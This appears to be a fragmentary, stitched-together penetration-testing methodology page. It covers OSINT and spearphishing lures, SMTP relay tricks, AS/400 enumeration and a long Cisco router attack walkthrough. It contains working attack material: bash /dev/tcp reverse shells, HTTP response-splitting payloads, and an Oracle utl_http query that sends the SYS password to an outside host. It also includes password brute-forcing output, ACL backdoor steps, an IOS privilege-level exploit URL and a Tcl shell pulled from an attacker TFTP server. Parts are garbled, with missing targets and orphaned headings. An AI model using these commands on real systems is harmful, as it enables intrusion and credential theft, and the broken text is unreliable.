Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.




Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.

The following sites are some of many social and business related networking entities that are in use today.??Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc.

Finding a persons particular interests may make a potential client side attack more successful if you can find a related "hook" in any potential "spoofed" email sent for them to click on (A Spearphishing technique)

Note: - This list is not exhaustive and has been limited to those with over 1 million members.

Common passwords

HELO anything

Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>

Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">

User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>

Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>

Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

./joomlascan.py <site> <options>??[options i.e. -p/-proxy <host:port> : Add proxy support?-404 : Don't show 404 responses]

SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;





Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"

446;ddm;DDM Server is used to access data via DRDA and for record level access

449;As-svrmap; Port Mapper returns the port number for the requested server

2001;As-admin-http;HTTP server administration

5544;As-mtgctrlj;Management Central Server used to manage multiple AS/400S in a net

5555;As-mtgctrl;Management Central Server used to manage multiple AS/400S in a net

8470;As-Central;Central Server used when a client Access licence is required for downloading translation tables

8471;As-Database;Database server used for accessing the AS/400 database

8472;As-dtaq;Data Queue server allows access to the AS/400 data queues used for passing data between applications

8473;As-file;File Server is used for accessing any part of the AS/400

8474;as-netprt; Printer Server used to access printers known to the AS/400

8475;as-rmtcmd;Remote Command Server used to send commands from PC to an AS/400

8476;as-signon;Sign-on server is used for every client Access connection to authenticate users and to change passwords

8480;as-usf;Ultimedia facilities used for multimedia data

447;ddm-ssl;DDM Server is used to access data via DRDA and for record level access

448;ddm;DDM Server is used to access data via DRDA and for record level access

992;telnet-ssl;Telnet Server

2010;As-admin-https;HTTP server administration

5566;As-mtgctrl-ss;Management Central Server used to manage multiple AS/400S in a net

5577;As-mtgctrl-cs;Management Central Server used to manage multiple AS/400S in a net

9470;as-central-s;Central Server used when a client Access licence is required for downloading translation tables

9471;as-database-s;Database Server

9472;as-dtaq-s;Data Queue server allows access to the AS/400 data queues used for passing data between applications

9473;as-file-s;File Server is used for accessing any part of the AS/400

9474;as-netprt-s; Printer Server used to access printers known to the AS/400

9475;as-rmtcmd-s;Remote Command Server used to send commands from PC to an AS/400

9476;as-signon-s;Sign-on server is used for every client Access connection to authenticate users and to change passwords

CPF1107: Password not correct for user profile XXXX

CPF1120: User XXXX does not exist

CPF1116 : Next not valid sign-on attempt variers off device?

CPF1392 : Next not valid sign-on attempt disables user profile XXXX

CPF1394: User profile XXXX cannot sign on?

CPF1118:No password associated with the user XXXX

CPF1109: Not authorized to subsystem

CPF1110: Not authorized to work station?

dn: cn=System, cn=System Backends, cn=IBM Directory, cn=Schemas, cn=Configuration

cn: System

slapdPlugin: database /QSYS.LIB/QGLDPSYS.SRVPGM sysprj_backend_init

slapdReadOnly: FALSE


objectclass: top

objectclass: ibm-slapdConfigEntry

objectclass: ibm-slapdOs400SystemBackend

Server : AS400_ANDOLINI



ldapsearch -h AS400SERVER \ -b "cn=accounts,os400-sys=AS400-Name" \ -D "os400-profile=$LOGIN$,cn=accounts,os400-sys=AS400-Name" \ -w $PASSWRD -L -s sub "os400-profile=*" > MyUSERS.log

AS400-Name : is the value you grabbed before

ldapsearch -h target \ -b "cn=accounts,os400-sys=AS400-Name" \ -D "os400-profile=$LOGIN$,cn=accounts,os400-sys=AS400-Name" \ -w $PASSWRD -L -s sub "os400-profile=USER_YOU_WANT" > COMPLETEINFO_ONUSER.log


System security level objects and operating system integrity

Recommended value : 30

Level of security selected is sufficient for keeping Passwords,

objects and operating system integrity

Insufficient security level could compromise

objects and operating system integrity


Verify object on restore verifies object signatures

during restore.

Do not verify signatures on restore, allowing such a command

or program represents an integrity risk to your system


Maximum sign-on attempts

This restricts the number of times a user can incorrectly attempt

to sign-on to the system before being disabled.?

The action taken by the system when this number is exceeded

is determined by the preceding parameter


Inactive Job Time-Out

Value 0 means the system will never

log a user off the system.?


Password expiration interval specifies whether user passwords expire or not,

controls the number of days allowed before a password must be changed.

Number of days before expiration interval exceeds the recommended, this

compromises the password security on your system


Duplicate password control prevents users

from specifying passwords that they have

used previously

Recommended value is 1

This prevents passwords from being reused for (returned value) generations for a user ID.?


Minimum password length specifies the

minimum number of characters for a password

Recommended value is 5 ( 6 is a must)

This forces passwords to a minimum length of (returned value) alphanumeric characters.


Maximum password length maximum number

of characters for a password

Recommended value is 10

This limits the length of a password to (returned value) alphanumeric characters.?


Password level the system can be set to

allow for user profile passwords from 1-10 or

1-128 characters


This ensures that all security related functions are audited and stored

in a log file for review and follow-up

*PGMR ---> Programmer

*SECADM ---> Security Administrator

*SECOFR ---> Security Officer

*SYSOPR --->System Operator

*USER ---> User

*AUDLVL System auditing : System auditing events logged and may be audited

*OBJAUD Object auditing : Object auditing activity defined logged and may be audited

*AUTFAIL Authorized failure: All access failure,Incorrect Password or User ID logged and may be audited

*PGMFAIL System integrity violation : Blocked instructions,Validation failure,Domain violation logged and may be audited

*JOBDTA Job tasks : Job start and stop data(disconnect,prestart) logged and may be audited

*NETCMN Communication & Networking tasks : Action that occur for APPN filtering support logged and may be audited

*SAVRST Object restore: Restore(PGM,JOBD,Authority,CMD,System State) logged and may be audited

*SECURITY Security tasks: All security related functions(CRT/CHG/DLT/RST) logged and may be audited

*SERVICE Services HW/SW: Actions for performing HW or SW services logged and may be audited

*SYSMGT System management: Registration,Network,DRDA,SysReplay,Operational not logged and cannot be audited

*CREATE Object creation: Newly created objects, Replace exisitng objects logged and may be audited

*DELETE Object deletion: All deletion of external objects logged and may be audited

*OFCSRV Office tasks: Office tasks(system distribution directory,Mail) logged and may be audited

*OPTICAL Optical tasks: Optical tasks(add/remove optical cartridge,Autho) logged and may be audited

*PGMADP Program authority adoption: Program adopted authority, gain access to an object logged and may be audited

*OBJMGT Object management: Object management logged and may be audited

*SPLFDTA Spool management: Spool management logged and may be audited

All-Object Authority (*ALLOBJ) : This is the most powerful authority on any AS400 system. This authority grants the user complete access to everything on the system. A user with All-Object Authority cannot be controlled.

Service Authority (*SERVICE) : Service Authority provides the user with the ability to change system hardware and disk configurations, to sniff network traffic and to put programs into debug mode (troubleshooting mode) and see their internal workings. The system services tools include the ability to trace systems functions and to patch and alter user made and IBM delivered programs on disk

manipulate data on disk.

Save and Restore Authority (*SAVSYS) : This authority allows the user to backup and restore objects. The user need not have authority to those objects. The risk with SAVSYS Authority is that a user with this authority can save all objects (including the most sensitive files) to disk (save file), delete any object (with the Free Storage option), restore the file to an alternate library, and then view and alter the information. Should the user alter the information, they would have the ability to replace the production object with

their saved version.

System Configuration Authority (*IOSYSCFG) : System communication configuration authority can also be used to set up nearly invisible access from the outside as a security officer -- without needing a password. System Configuration Authority provides the ability to configure and change communication configurations (e.g. lines, controllers, devices), including the system's TCP/IP and Internet connection information.

Spool Control Authority (*SPLCTL) : Spool Control authority gives the user read and modify all spooled objects (reports, job queue entries, etc.) on your system. The user may hold, release and clear job and output queues, even if they are not authorized to those queues.

Security Administrator Authority (*SECADM) : Security Administrator grants the authority to create, change and delete user ID?s. This authority should be reserved to essential administration personnel only.

Job Control Authority (*JOBCTL) : Job Control Authority can be used to power down the system or to terminate subsystems or individual jobs at any time, even during critical operational periods. Job Control Authority provides the capability to control other user?s jobs as well as their spooled files and printers.

Audit Authority (*AUDIT) : Audit Authority puts a user in control of the system auditing functions. Such a user can manipulate the system values that control auditing and control user and object auditing. These users could also turn off auditing for sensitive objects in an effort to obscure certain actions

# atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
# bccmd by Marcel Holtmann
# bdaddr.c by Marcel Holtmann
# bluetracker.py by smiley
# psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
# BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
# btftp v0.1 by Marcel Holtmann
# btobex v0.1 by Marcel Holtmann
# greenplaque v1.5 by digitalmunition.com
# L2CAP packetgenerator by Bastian Ballmann
# redfang v2.50 by Ollie Whitehouse
# ussp-push v0.10 by Davide Libenzi
# exploits:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Nokia N70 l2cap packet DoS PoC Pierre Betouin
Sony-Ericsson reset display PoC by Pierre Betouin

The purpose of 'Scan & Fingerprint' is to identify open ports on the target device and attempt to determine the exact IOS version.??This then sets the plan for further attacks.

It Telnet is active, then password guessing attacks should be performed.

If a network engineer/administrator has configured just one Cisco device with a poor password, then the whole network is open to attack.??Attempting to connect with various usernames/passwords is a mandatory step to testing the level of security that the device offers.

Once you have identified the access credentials, whether that be HTTP, Telnet or SSH, then connect to the target device to identify further information.

To check for known bugs, vulnerabilities or security flaws with the device, a good security scanner should be used

To further the attack into the target network, some changes need to be made to the running-config file of the target device. There are two main categories for configuration files with Cisco routers - running-config and startup-confg:

Once you have access to the config files, you will need enable (privileged mode) access for this, you can add an access list rule to allow your IP address into the internal network.???The following ACL will allow the defined <IP> access to any internal IP address. So if the router is protecting a web server and an email server, this ACL will allow you to pass packets to those IP addresses on any port.??Therefore you should be able to port scan them efficiently.

To effectively scan a Cisco device, both TCP and UDP ports across the whole range must be checked.
There are a number of tools that can achieve the goal, however we will stick with nmap examples.

TCP scan: - This will perform a TCP scan, fingerprint, be verbose, scan ports 1-65535 against IP and output the results in normal mode to TCP.scan.txt file. nmap??-sT??-O??-v??-p??1-65535??<IP>??-oN??TCP.scan.txt

UDP scan: - This will perform a UDP scan, be verbose,??scan ports 1.65535 against IP and output the results in normal mode to UDP.scan.txt file. nmap??-sU??-v??-p??1-65535??<IP>??-oN??UDP.scan.txt

ciscos is a scanner for discovering Cisco devices in a given CIDR network range.

cisco-torch is a fingerprinter for Cisco routers.?There are a number of different fingerprinting switches, such as SSH, telnet or HTTP e.g.??The -A switch should perform all scans, however I have found it to be unreliable.

List of targets contains 1 host(s) 14489:??

Checking ...


Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP)

Fingerprinting Successful

Cisco-IOS Webserver found ?

HTTP/1.1 401 Unauthorized

Date: Mon, 01 Mar 1993 00:34:11 GMT

Server: cisco-IOS Accept-Ranges: none

WWW-Authenticate: Basic realm="level_15_access"

401 Unauthorized

nmap version scan: - Once open ports have been identified, version scanning should be performed against them.??In this example, TCP ports 23 and 80 were found to be open.

UDP Port scan - nmap -sV -O -v -p 161,162 <IP> -oN UDP.version.txt

CAT (Cisco Auditing Tool): - This tool??extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

BT cisco-auditing-tool-v.1.0 # CAT -h -a /tmp/dict.txt

Guessing passwords:

Invalid Password: 1234

Invalid Password: 2read

Invalid Password: 4changes

Password Found: telnet

brute-enabler is an internal enable password guesser.??You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.

BT brute-enable-v.1.0.2 # ./enabler??

[`] OrigEquipMfr... wrong password

[`] Cisco... wrong password

[`] agent... wrong password

[`] all... wrong password

[`] possible password found: cisco

hydra: - hydra is a multi-functional password guessing tool.??It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password. (Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!).

Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10 [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59),

~14 tries per task [DATA] attacking service cisco on port 23

Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)

[STATUS] attack finished for (waiting for childs to finish)

[23][cisco] host: telnet

CAT (Cisco Auditing Tool): - This tool??extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

BT cisco-auditing-tool-v.1.0# CAT -h -w /tmp/snmp.txt

Checking Host:

Guessing passwords:

Invalid Password: cisco

Invalid Password: ciscos

Guessing Community Names:

Invalid Community Name: CISCO

Invalid Community Name: OrigEquipMfr

Community Name Found: Cisco

onesixtyone is a reliable SNMP community string guesser.???Once it identifies the correct community string, it will display accurate fingerprinting information.

snmpwalk: - snmpwalk is part of the SNMP toolkit.??After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information.??Ensure that you get the correct version of SNMP protocol in use or it will not work correctly.??It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.

BT# snmpwalk -v 1 -c enable

SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99 SNMPv2-MIB::sysContact.0 = STRING: SNMPv2-MIB::sysName.0 = STRING: router SNMPv2-MIB::sysLocation.0 = STRING: SNMPv2-MIB::sysServices.0 = INTEGER: 78 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00 IF-MIB::ifNumber.0 = INTEGER: 4

The telnet service on Cisco devices can authenticate users based upon a password in the config file or against a RADIUS or TACACS server. If the device is simply using a VTY configuration for Telnet access, then it is likely that only a password is required to log on. If the device is passing authentication details to a RADIUS or TACACS server, then a combination of username and password will be required.

VTY configuration:
BT / # telnet
Connected to
Escape character is '^]'.
User Access Verification

External authentication server:
BT / # telnet
Connected to
Escape character is '^]'.
User Access Verification
Username: admin

HTTP/HTTPS: - Web based access can be achieved via a simple web browser, as long as the HTTP adminstration service is active on the target device:

Show tech-support - display information commonly needed by tech support.

Extended Ping - Send extended ping commands.???

Trivial File Transfer Protocol is used to back up the config files of the router.??Should an attacker discover the enable password or RW SNMP community string, the config files are easy to retrieve.

?Cain & Abel -Cisco Configuration Download/Upload (CCDU)??With this tool the RW community string and the version of SNMP in use and running-config file can be downloaded to your local system.?

There are ways of extracting the config files directy from the router even if the names have changed, however you are really limited by the speed of the TFTP server to dictionary based attacks.??Cisco-torch is one of the tools that will do this.??It will attempt to retrieve config files listed in the brutefile.txt file:

source tftp tftp://<Attacker_TFTP_SERVER>/tclshell_ios.tcl

Cisco Global Exploiter (CGE-13): - CGE is an attempt to combine all of the Cisco attacks into one tool.

perl cge.pl <target> <vulnerability number>

[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

[2] - Cisco IOS Router Denial of Service Vulnerability

[3] - Cisco IOS HTTP Auth Vulnerability

[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

[6] - Cisco 675 Web Administration Denial of Service Vulnerability

[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

?[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

[9] - Cisco 514 UDP Flood Denial of Service Vulnerability

[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability

[11] - Cisco Catalyst Memory Leak Vulnerability

[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability

HTTP Arbitrary Access vulnerability: - A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability.??This flaw allowed an external attacker to execute router commands via the web interface.??Cisco devices have a number of??privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15??are used.??Level 15 is Privileged EXEC mode, the same as enable mode.??By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode.

Click cancel to the logon box and enter the following address:

?http://<IP>/level/99/exec/show/config?(You may have to scroll through all of the levels from 16-99 for this to work.)

To raise the logging level to only log emergencies:

To add a rule to allow Telnet:

ios-w3-vuln: - A CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.)??As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally.?

Configuration Files.
The relevant configuration files that control a Cisco router have already been covered in Methodology | (5) Further your attack. In the child to this entry is a sample running-config file from a Cisco 2600 router running IOS version 12.2.

Telnet Access. If telnet is configured on the VTY (Virtual TTY) interface, then the credentials will be in the config file: line vty 0 4 password telnet login

SNMP Settings. If the target router is configured to use SNMP, then the SNMP community strings will be in the config file.??It should have the read-only (RO) and may have the read-write (RW) strings: snmp-server community Cisco RO snmp-server community enable RW

Enable password. The Holy Grail, the 'enable' password, the root level access to the router.??There are two main methods of storing the enable password in a config file, type 5 and type 7, MD5 hashed and Viginere encryption respectively. An example is:?enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.????

Type 7 should be avoided as it is extremely easy to crack, it can even be done by hand!??An example Type 7 password is given below but does not exist in the example running-config file: enable password 7 104B0718071B17 They can be cracked with the following tools:?

Type 5 password protection is much more secure.??However, should an attacker get hold of the configuration file somehow, then the MD5 hash can be extracted and cracked offline with the following tools:?

version 12.2
service config
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
hostname vapt-router
logging queue-limit 100
enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
enable password router
memory-size iomem 10
ip subnet-zero
no ip routing

ip audit notify log
ip audit po max-events 100
no voice hpi capture buffer
no voice hpi capture destination?
mta receive maximum-recipients 0

interface Ethernet0/0
?ip address
?no ip route-cache
?no ip mroute-cache
interface Serial0/0
?no ip address
?no ip route-cache
?no ip mroute-cache
ip http server
no ip http secure-server
ip classless

snmp-server community Cisco RO
snmp-server community enable RW
snmp-server enable traps tty
call rsvp-sync
mgcp profile default
dial-peer cor custom
line con 0
line aux 0
line vty 0 4
password telnet

Note: - It is possible to grep all Citrix/ NFuse/ NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file replacing the local version in nikto\plugins directory should you wish to specifically limit your enumeration to Citrix vulnerabilties. As of 1 Oct 09, there are currently 9 specific tests meeting these requirements.

Note: - AT by default runs as system and although enabled for a normal user, will only work with these privileges for an admin, however, still worth a try.

bforce.js TCPBrowserAddress=ip-address usernames=user1,user2 passwords=pass1,pass2 timeout=5000

Vulnerabilties and exploit information relating to these products can be found here:





eapmd5pass -w dictionary_file -U username -C EAP-MD5 Challengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e.

-C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2